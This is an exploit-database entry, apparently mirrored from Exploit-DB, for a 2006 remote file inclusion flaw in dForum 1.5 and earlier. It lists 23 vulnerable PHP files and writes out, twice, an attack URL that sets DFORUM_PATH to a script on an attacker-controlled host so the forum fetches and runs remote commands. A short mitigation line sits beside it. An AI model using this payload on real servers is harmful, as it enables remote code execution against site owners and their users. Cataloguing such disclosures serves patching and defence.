header-logo
Suggest Exploit
vendor:
dForum
by:
nukedx
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: dForum
Affected Version From: dForum <= 1.5
Affected Version To: dForum <= 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:dforum:dforum
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities

This exploit works on dForum <= 1.5 by accessing the vulnerable files such as about.php, admin.php, anmelden.php, closethread.php, config.php, delpost.php, delthread.php, dfcode.php, download.php, editanoc.php, forum.php, login.php, makethread.php, menu.php, newthread.php, openthread.php, overview.php, post.php, suchen.php, user.php, userconfig.php, userinfo.php, verwalten.php, by using the URL http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?

Mitigation:

Ensure that the application is not vulnerable to Remote File Inclusion attacks by validating user input and sanitizing the input data.
Source

Exploit-DB raw data:

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php
Original advisory: http://www.nukedx.com/?viewdoc=27
# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]

Navigation

Suggest Exploit

Services By CQR